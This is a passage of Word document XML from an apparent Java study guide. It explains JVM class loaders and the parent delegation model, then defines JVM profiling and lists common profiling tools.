        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="94" w:name="_Toc197867308"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What are the different loaders in JVM?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="94"/>
    </w:p>
    <w:p w14:paraId="24A79CD3" w14:textId="19689999" w:rsidR="00EE10FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE10FC" w:rsidP="001633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ass loaders in Java </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>dynamically load classes into memory</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> when required. They're part of the JVM and follow the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>parent delegation model</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to maintain security and consistency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D381B6D"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EECA6E">
          <v:rect id="_x0000_i1249" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C80F71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7633"/>
      </w:tblGrid>
      <w:tr w:rsidR="0016339C" w:rsidRPr="00CE4B95" w14:paraId="3E92FFFE" w14:textId="77777777" w:rsidTr="00EE10FC">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7A942D08"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 Loader</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2190798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6339C" w:rsidRPr="00CE4B95" w14:paraId="78B1A23F" w14:textId="77777777" w:rsidTr="00EE10FC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="287385D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Bootstrap ClassLoader</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="72E28FC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ore Java classes from rt.jar (like java.lang.*, java.util.*). Part of the JVM, written in native code.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0016339C" w:rsidRPr="00CE4B95" w14:paraId="03F06ACD" w14:textId="77777777" w:rsidTr="00EE10FC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="51AA41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2. Extension (Platform) ClassLoader</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0B9F93A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ext directory ($JAVA_HOME/lib/ext). Now replaced by </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Platform ClassLoader</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> from Java 9.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0016339C" w:rsidRPr="00CE4B95" w14:paraId="3B49C0A5" w14:textId="77777777" w:rsidTr="00EE10FC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="393DFAF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Application (System) ClassLoader</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="19D27E7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w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>classpath</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> specified by the user (.class files or JARs).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0016339C" w:rsidRPr="00CE4B95" w14:paraId="7A1B2CB0" w14:textId="77777777" w:rsidTr="00EE10FC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="17703CA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ustom ClassLoader</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="47D2B94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fined loader by extending ClassLoader class, useful for advanced use cases like encryption, hot reloading, etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7F8E4FD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8CFED">
          <v:rect id="_x0000_i1250" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="119A380A"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ent Delegation Model (Hierarchy)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64648304"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ss</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F0310C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3A8C5AB"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tstrap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB3FD52"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0A289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sion (Platform)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C37DE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C29D8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System)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03211E6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9731C7"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ClassLoader (if created)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5D5E2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class loader </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>delegates</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the loading task to its </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>parent first</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. If the parent cannot find the class, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>only then</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> does the current loader try.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F22495"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AD9B80">
          <v:rect id="_x0000_i1251" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F725239"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heck Which ClassLoader Loaded a Class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC95CB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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF632F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620D215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Loader {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC3EB2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3202E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ing class loader: " + String.class.getClassLoader());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A4B25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estLoader class loader: " + TestLoader.class.getClassLoader());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5AF60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9DEB8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6234B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08E69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tlin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528115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D3178E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class loader: null   // Loaded by Bootstrap (native)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF9500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Loader class loader: jdk.internal.loader.ClassLoaders$AppClassLoader@...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507EEE6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33669F">
          <v:rect id="_x0000_i1252" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="308D06E4"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for Custom ClassLoader</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4E1D04"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classes over the network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28BBE12B"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sandboxed environments (JVM security)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ABA09BC"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t deployment in frameworks like Spring, Tomcat, OSGi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D7D5B1" w14:textId="6A643E9F"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BC89E0D">
          <v:rect id="_x0000_i1253" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3484AA0F" w14:textId="650956EA" w:rsidR="00A8451E" w:rsidRPr="00CE4B95" w:rsidRDefault="00A8451E" w:rsidP="00A8451E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="95" w:name="_Toc197867309"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is JVM profiling?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="95"/>
    </w:p>
    <w:p w14:paraId="1EE87732" w14:textId="4F507196" w:rsidR="00A8451E" w:rsidRPr="00CE4B95" w:rsidRDefault="00A8451E" w:rsidP="006A794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profiling</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the process of </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>monitoring and analyzing the performance</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of a Java application running on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to identify bottlenecks, memory leaks, thread issues, CPU usage, and more.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A22C72" w14:textId="77777777" w:rsidR="00F268F4" w:rsidRPr="00CE4B95" w:rsidRDefault="00F268F4" w:rsidP="006A794A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57318211" w14:textId="32A52C53"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developers understand </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>how the application behaves at runtime</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which parts of the code consume the most resources, and how to optimize it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2157BC44"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05547">
          <v:rect id="_x0000_i1254" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DDE3A5F"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spects of JVM Profiling:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117214C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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6094981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heap</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> memory usage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9CB81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cessive garbage collection (GC)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4E90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object creation</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and memory retention.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3307E2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 Usage</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509731E5"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dentify </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>methods or classes</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> consuming the most CPU time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5361F07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hotspots</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F52C9A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GC)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560E6C32"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 how often GC occurs and how much time it takes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0259AF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une JVM GC settings based on profiling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A60CF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Activity</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4C0E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thread states (running, waiting, blocked).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E308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deadloc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 conten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ace conditions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC73D21"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ing</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C80D44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alyze which classes are loaded/unloaded and their memory footprint.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555DB2D0"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2B4F">
          <v:rect id="_x0000_i1255" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A1C6C8"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968"/>
      </w:tblGrid>
      <w:tr w:rsidR="006A794A" w:rsidRPr="00CE4B95" w14:paraId="3344DFE0" w14:textId="77777777" w:rsidTr="00A8451E">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0753ABBE"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2FF05DA2"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6A794A" w:rsidRPr="00CE4B95" w14:paraId="65EE09A5" w14:textId="77777777" w:rsidTr="00A8451E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="744D6D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isualVM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="597E862B"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ndled with JDK; visual profiler for memory, CPU, GC, threads.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A794A" w:rsidRPr="00CE4B95" w14:paraId="2B5CF6C7" w14:textId="77777777" w:rsidTr="00A8451E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="77F4D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Console</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="074CE0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monitoring tool; good for basic profiling.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A794A" w:rsidRPr="00CE4B95" w14:paraId="79DCB655" w14:textId="77777777" w:rsidTr="00A8451E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2874099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rKit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="06A16C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advanced features for memory, threads, GC analysis.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A794A" w:rsidRPr="00CE4B95" w14:paraId="128D5A03" w14:textId="77777777" w:rsidTr="00A8451E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="234BCCD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Profiler</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2DFE5EF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very powerful for CPU/memory/thread profiling.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A794A" w:rsidRPr="00CE4B95" w14:paraId="477A6297" w14:textId="77777777" w:rsidTr="00A8451E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="53C2CE60"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ight Recorder &amp; Mission Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="737415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 into Oracle JDK; low-overhead continuous profiling.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A794A" w:rsidRPr="00CE4B95" w14:paraId="7B49CDDB" w14:textId="77777777" w:rsidTr="00A8451E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3D2522E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ync Profiler</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="54B9E9C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ow-overhead async CPU and memory profiler.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A794A" w:rsidRPr="00CE4B95" w14:paraId="32CA3DC3" w14:textId="77777777" w:rsidTr="00A8451E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="596B3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 (Linux)</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Java Flame Graphs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="018DAA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vanced profiling using Linux performance tools.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
